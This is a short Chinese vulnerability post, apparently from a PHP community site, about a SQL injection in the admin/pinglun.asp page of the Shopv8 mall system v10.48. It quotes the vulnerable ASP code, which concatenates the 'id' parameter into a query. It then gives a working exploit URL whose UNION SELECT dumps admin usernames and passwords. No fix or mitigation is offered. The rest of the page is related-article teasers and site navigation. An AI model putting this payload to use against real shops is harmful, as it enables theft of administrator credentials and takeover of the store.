Shopv8商城系统v10.48漏洞

Shopv8商城系统 v10.48 漏洞

发布作者：Lan3a
影响版本： Shopv8商城系统 v10.48 
漏洞描述： pinglun.asp页面存在SQL注入
Author:Lan3a

后台：pinglun.asp这个文件。

代码如下：
 <%dim bookid,action  
pinglunid=request.QueryString("id")     直接提交  
action=request.QueryString("action")  
if action="save" then  
set rs=server.CreateObject("adodb.recordset")  
rs.open "select * from shop_pinglun where pinglunid="&pinglunid,conn,1,3  
rs("huifu")=HTMLEncode2(trim(request("huifu")))  
rs("huifudate")=now()  
rs.update  
rs.close  
set rs=nothing 
response.write ""  
response.End  
end if  
%> 

发表评论

<%set rs=server.CreateObject("adodb.recordset")   rs.open "select * from shop_pinglun where pinglunid="&pinglunid,conn,1,3   直接传入查询   %>   下面直接贴 利用方法了：  http://localhost/admin/pinglun.asp?id=1%20and%2201=2%20union%20select%201,2,3,4,username,password,7,8,9,10,11%20from%20admin sql 注入 html javascript go 写下你的评论吧 ! 吐个槽吧,看都看了 会员登录 | 用户注册 推荐阅读 js 介绍一个免费的具备数据显示/录入/更新/删除功能的asp.net控件 本文介绍了一个免费的asp.net控件，该控件具备数据显示、录入、更新、删除等功能。它比datagrid更易用、更实用，同时具备多种功能，例如属性设置、数据排序、字段类型格式化显示、密码字段支持、图像字段上传和生成缩略图等。此外，它还提供了数据验证、日期选择器、数字选择器等功能，以及防止注入攻击、非本页提交和自动分页技术等安全性和性能优化功能。最后，该控件还支持字段值合计和数据导出功能。总之，该控件功能强大且免费，适用于asp.net开发。 ... [详细] 蜡笔小新   2023-12-11 09:41:26 js 互联网思维中的3个段子，9大分类和19条法则 本文介绍了互联网思维中的三个段子，涵盖了餐饮行业、淘品牌和创业企业的案例。通过这些案例，探讨了互联网思维的九大分类和十九条法则。其中包括雕爷牛腩餐厅的成功经验，三只松鼠淘品牌的包装策略以及一家创业企业的销售额增长情况。这些案例展示了互联网思维在不同领域的应用和成功之道。 ... [详细] 蜡笔小新   2023-12-10 14:58:10 get Google Contacts API未返回输出 - Google Contacts API not returning output Itwasworkingcorrectly,butyesterdayitstartedgiving401.IhavetriedwithGooglecontactsAPI ... [详细] 蜡笔小新   2023-10-15 16:40:16 get 使用粘性页眉和页脚切换侧栏 - Toggle Sidebar with sticky header and footer Iwouldliketobeabletohaveasidebarthatcanbetoggledinandoutonabuttonpress.However ... [详细] 蜡笔小新   2023-10-13 12:28:22 get CSS3选择器的使用方法详解，提高Web开发效率和精准度 本文详细介绍了CSS3新增的选择器方法，包括属性选择器的使用。通过CSS3选择器，可以提高Web开发的效率和精准度，使得查找元素更加方便和快捷。同时，本文还对属性选择器的各种用法进行了详细解释，并给出了相应的代码示例。通过学习本文，读者可以更好地掌握CSS3选择器的使用方法，提升自己的Web开发能力。 ... [详细] 蜡笔小新   2023-12-14 14:37:52 get 绕过WAF的XSS检测机制及构建XSS payload的方法 本文介绍了绕过WAF的XSS检测机制的方法，包括确定payload结构、测试和混淆。同时提出了一种构建XSS payload的方法，该payload与安全机制使用的正则表达式不匹配。通过清理用户输入、转义输出、使用文档对象模型（DOM）接收器和源、实施适当的跨域资源共享（CORS）策略和其他安全策略，可以有效阻止XSS漏洞。但是，WAF或自定义过滤器仍然被广泛使用来增加安全性。本文的方法可以绕过这种安全机制，构建与正则表达式不匹配的XSS payload。 ... [详细] 蜡笔小新   2023-12-11 19:42:30 get 揭秘阿里云WAF背后神秘的AI智能防御体系 背景应用安全领域，各类攻击长久以来都危害着互联网上的应用，在web应用安全风险中，各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ... [详细] 蜡笔小新   2023-12-11 01:30:52 get Mybatis中#与$的区别及其作用详解 本文详细介绍了Mybatis中#与$的区别及其作用。#{}可以防止sql注入，拼装sql时会自动添加单引号，适用于单个简单类型的形参。${}则将拿到的值直接拼装进sql，可能会产生sql注入问题，需要手动添加单引号，适用于动态传入表名或字段名。#{}可以实现preparedStatement向占位符中设置值，自动进行类型转换，有效防止sql注入，提高系统安全性。 ... [详细] 蜡笔小新   2023-12-10 14:30:39 get go利用(*interface{})(nil)传递参数类型的原理及应用 本文介绍了在go语言中利用(*interface{})(nil)传递参数类型的原理及应用。通过分析Martini框架中的injector类型的声明，解释了values映射表的作用以及parent Injector的含义。同时，讨论了该技术在实际开发中的应用场景。 ... [详细] 蜡笔小新   2023-12-10 11:37:12 get 从壹开始前后端分离【 .NET Core2.0 +Vue2.0 】框架之六 || API项目整体搭建 6.1 仓储模式 代码已上传Github+Gitee，文末有地址　　书接上文：前几回文章中，我们花了三天的时间简单了解了下接口文档Swagger框架，已经完全解放了我们的以前的Word说明文档，并且可以在线进行调 ... [详细] 蜡笔小新   2023-10-17 18:25:42 get C#设计模式之八装饰模式（Decorator Pattern）【结构型】 一、引言今天我们要讲【结构型】设计模式的第三个模式，该模式是【装饰模式】，英文名称：DecoratorPattern。我第一次看到这个名称想到的是另外一个词语“装修”，我就说说我对“装修”的理 ... [详细] 蜡笔小新   2023-10-17 17:43:55 scala 浅解XXE与Portswigger Web Sec XXE与PortswiggerWebSec​相关链接：​博客园​安全脉搏​FreeBuf​XML的全称为XML外部实体注入，在学习的过程中发现有回显的XXE并不多，而 ... [详细] 蜡笔小新   2023-10-17 16:52:48 get PreparedStatement防止SQL注入 添加数据：packagecom.hyc.study03;importcom.hyc.study02.utils.JDBCUtils;importjava.sql ... [详细] 蜡笔小新   2023-10-17 16:36:42 js java开发中常用框架优缺点 一、Struts2是一个基于MVC设计模式的Web应用框架在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2优点1、实现 ... [详细] 蜡笔小新   2023-10-17 16:19:02 js 计算机睡眠能远程吗,远程服务器可以睡眠吗 弹性云服务器ECS弹性云服务器(ElasticCloudServer)是一种可随时自助获取、可弹性伸缩的云服务器，帮助用户打造可靠、安全、灵活、高效的应用环境 ... [详细] 蜡笔小新   2023-10-17 15:48:57 丶希_ 这个家伙很懒，什么也没留下！ Tags | 热门标签 solr iostream cSharp config uml cmd usb require foreach bash substring php5 regex python3 get scala chat actionscrip search export tags request dagger jar jsp cPlusPlus hook heap nodejs js RankList | 热门文章 1Django查询时间段时间搜索过滤 2mysql keepalive_keepalive mysql 3爬程镙Python中駨现多黻务詥衮源殞小方弸[Python嗮袑问题] 4C#创建一个文本文件简单代码 5基于vscode的node的ES2015(ES6)运行环境搭建 6Elasticsearch模块功能之-路由（routing） 7echarts图形点击事件触发以及echarts图形点击事件多次触发问题解决 8尤字意思 在新华字典的读音解释笔画常用组词起名 9HBase2.0 procedureV2原理简析 10高逼格！索尼入门4K OLED电视走向全球：国行最爽 11求个Win732位系统镜像下载连接地址:win7系统镜像下载 12Spring MVC 注解式 13自动驾驶之高精地图 14【Linux学习】OpenCV+ROS 实现人脸识别（Ubantu16.04） 15《乐府杂曲·鼓吹曲辞·巫山高》翻译 原文赏析诗人唐齐己 PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具 Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有